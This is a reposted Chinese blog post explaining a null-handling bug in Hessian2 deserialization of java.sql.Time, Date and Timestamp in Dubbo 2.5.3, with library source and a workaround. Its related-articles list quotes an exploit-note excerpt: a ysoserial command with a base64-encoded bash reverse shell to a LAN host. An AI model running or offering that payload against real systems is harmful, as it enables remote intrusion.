dubbo 2.5.3对于java.sql的反序列化BUG

最新推荐文章于 2024-05-24 17:17:52 发布
最新推荐文章于 2024-05-24 17:17:52 发布
阅读量231 收藏
点赞数
文章标签: java
原文链接:https://segmentfault.com/a/1190000009482783
版权

背景

这是我之前提的问题:问题链接

在使用dubbo 2.5.3的时候,定义的接口中有一个方法使用了实体类作为参数,而这个实体类中定义了一个变量为java.sql.Time类型。不妨暂且定义接口如下:

//BusinessDto中有一个属性dealTime 为java.sql.Time类型
String queryBusiness(BusinessDto param);

当消费者调用这个接口的时候,如果param中的dealTime为null,那么在提供者那里接收到的整个param都为null,如果这个属性不为null,那么参数可以正常的传递。

问题原因解析

问题出在反序列化的时候。
dubbo使用的序列化是hession2的,而hession2对于Time类的反序列化的源码如下:


    static class SqlTimeFieldDeserializer extends FieldDeserializer {
    private final Field _field;
    SqlTimeFieldDeserializer(Field field)
    {
      _field = field;
    }
    
    void deserialize(AbstractHessianInput in, Object obj)
      throws IOException
    {
      java.sql.Time value = null;
      try {
        java.util.Date date = (java.util.Date) in.readObject();
        value = new java.sql.Time(date.getTime());
        _field.set(obj, value);
      } catch (Exception e) {
        logDeserializeError(_field, obj, value, e);
      }
    }
  }

这里我们可以清楚地看出来,将in读取到的object转为Date然后调用了getTime方法,那么如果我们的dealTime属性为空,那么调用getTime函数必然会抛异常,也就产生了之后的结果。

补充说明

我找到的源码可以看出,对于 java.sql.Date, java.sql.Timestamp, java.sql.Time的反序列化均有问题存在。

  static class SqlDateFieldDeserializer extends FieldDeserializer {
    private final Field _field;
    SqlDateFieldDeserializer(Field field)
    {
      _field = field;
    }
    
    void deserialize(AbstractHessianInput in, Object obj)
      throws IOException
    {
      java.sql.Date value = null;
      try {
        java.util.Date date = (java.util.Date) in.readObject();
        value = new java.sql.Date(date.getTime());
        _field.set(obj, value);
      } catch (Exception e) {
        logDeserializeError(_field, obj, value, e);
      }
    }
  }
  static class SqlTimestampFieldDeserializer extends FieldDeserializer {
    private final Field _field;
    SqlTimestampFieldDeserializer(Field field)
    {
      _field = field;
    }
    
    void deserialize(AbstractHessianInput in, Object obj)
      throws IOException
    {
      java.sql.Timestamp value = null;
      try {
        java.util.Date date = (java.util.Date) in.readObject();
        value = new java.sql.Timestamp(date.getTime());
        _field.set(obj, value);
      } catch (Exception e) {
        logDeserializeError(_field, obj, value, e);
      }
    }
  }
  static class SqlTimeFieldDeserializer extends FieldDeserializer {
    private final Field _field;
    SqlTimeFieldDeserializer(Field field)
    {
      _field = field;
    }
    
    void deserialize(AbstractHessianInput in, Object obj)
      throws IOException
    {
      java.sql.Time value = null;
      try {
        java.util.Date date = (java.util.Date) in.readObject();
        value = new java.sql.Time(date.getTime());
        _field.set(obj, value);
      } catch (Exception e) {
        logDeserializeError(_field, obj, value, e);
      }
    }
  }

而hessian4 则修复了这个问题,在调用getTime之前做了非空判断,如果为空则把这个属性赋null而不是产生异常。

如果已经开始大规模的使用那么不妨使用别的类型,绕过这三个类型即可避免这个问题。

总结

问题来源于同事随口问的一个小问题,挺感兴趣就一直纠缠了下来,发现问题还是挺严重的,另外借用同事的一句话,不再维护的开源软件真的挺危险。

weixin_33890499
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Dubbo是一个高性能的,基于Java的开源RPC服务框架
05-24
Dubbo 是一个高性能优秀的服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring 框架无缝集成
dubbo序列化问题之 Serialized class cn.demo.vo.testDto is not in allow list. Current mode is `STRICT`
TANG256tang的博客
02-08 1475
dubbo序列化问题之 Serialized class cn.demo.vo.testDto is not in allow list. Current mode is `STRICT`
Apache Dubbo反序列化漏洞
最新发布
YJ_12340的博客
05-24 838
Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的RPC实现服务的输出和输入功能,可以和Spring框架无缝集成。2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为,漏洞等级:高危。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
序列化
u010112268的博客
03-09 148
序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 序列化使其他代码可以查看或修改,那些不序列化便无法访问的对象实例数据。确切地说,代码执行序列化需要特殊的权限:即指定了 SerializationFormatter 标志的 Secur...
【有料】DUBBO配置规则详解
daobuxinzi的博客
12-03 652
#DUBBO配置规则详解# 欢迎加入DUBBO交流群:259566260 研究DUBBO也已经大半年了,对它的大部分源码进行了分析,以及对它的内部机制有了比较深入的了解,以及各个模块的实现。DUBBO包含很多内容,如果想了解DUBBO第一步就是启动它,从而可以很好的使用它,那么如何更好的使用呢?就需要知道DUBBO的各个配置项,以及它可以通过哪些途径进行配置。个人对配置的理解,就好比时对动物的驯服,如何很好的驯服一头猛兽,那就需要知道它各种习性,从而调整,已达到自己期望的结果。这篇不对DUBBO有哪
Dubbo外部化配置(application.properties或application.yaml配置) 
Maple1997的博客
09-06 1420
Dubbo外部化配置(application.properties或application.yaml配置) Dubbo一开始推出的时候,主推的是xml方式,鉴于现在Spring框架或者SpringBoot框架所支持的更流行的配置方式, 是把各种应用的配置集成到application.properties或application.yaml中,也就是所谓的外部化配置(External Configuration). 简直是强迫症福音,只需要引入以下依赖 <dependency&...
dubbo-2.5.3.jar.zip
05-31
dubbo-2.5.3.jar包,压缩包内含有安装到本地maven仓库的执行语句。Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring框架无缝集成。
dubbo2.5.3.rar
09-07
Dubbo 2.5.3:打造高性能分布式服务架构》 Dubbo,作为阿里巴巴开源的一款强大、成熟的分布式服务框架,旨在提供高性能、透明化的RPC(Remote Procedure Call)服务调用解决方案,同时它也是实现SOA(Service-...
可用的dubbo-admin-2.5.3.war工具
12-19
可用的dubbo-admin-2.5.3.war工具,亲测可用。dubbo-admin-2.5.3.war,源码编辑的war包,注意是jdk1.8以下。本地环境默认安装zookeeper后可放到tomcat下直接运行。
dubbo-monitor-simple-2.5.3-assembly.tar.gz
11-18
dubbo-monitor-simple-2.5.3-assembly.tar.gz解压后的文件夹,dubbo的监控中心,同时也是dubbo的一个服务。修改/conf目录下dubbo.properties,dubbo.registry.address=zookeeper://192.168.11.129:2181
dubbo-admin-2.5.3.war
10-22
想要学习大数据的同鞋们 快点来下这是直接就可以运行的的dubbo管理界面
干翻Dubbo系列第三篇:Dubbo技术栈中核心术语与第一个Dubbo3应用程序
热门推荐
七叔的博客
07-10 1万+
本文是干翻Dubbo系列文章中的第三篇,在本篇中我们不仅仅对Dubbo技术栈中核心术语与做了详细的介绍,并编写了第一个基于Dubbo3应用程序!
解决Dubbo反序列化时报错
GUILTYxc的博客
03-15 2331
STRICT参考官网关于类检查机制的说明我使用的版本默认的检查模式为STRICT,禁止反序列化所有不在允许序列化列表(白名单)中的类。共有三个模式:STRICT 严格检查,WARN 告警,DISABLE 禁用。
Dubbo泛化调用处理序列化问题
Satan的博客
10-30 1769
知其然要知其所以然,刚好趁这个机会把博客重新捡起来。 一、如何泛化调用 使用泛化调用 | Apache Dubbohttps://dubbo.apache.org/zh/docs/advanced/generic-reference/官网已经给出例子了。那我们要解析一般的dubbo在调用的时候在做什么。 泛化调用过程中我们作为一个客户端,会连接到注册中心,拿到指定的api接口服务以及这个接口服务下面的所有方法。 然后找到我们指定的接口方法发起invoker调用。 注意:ReferenceCo
Jackson对象映射器对Date的序列化和返序列化
shallowdream822的博客
07-27 1142
Date序列化和反序列化
Apache Dubbo 存在反序列化漏洞(CVE-2023-23638)
murphysec的博客
03-09 4393
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1056
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3742
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
Dubbo怎么解决java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.Class
10-03
Dubbo是一个开源的高性能、轻量级的Java RPC框架,它解决了远程通信的问题。对于java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.Class的异常,可以通过使用--add-opens参数来解决。这个参数可以打开指定模块的某些包,使得在运行时可以访问这些包下的非公共类和成员。具体来说,在启动Dubbo服务时,可以使用--add-opens参数来打开相关的包,以解决反射访问的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值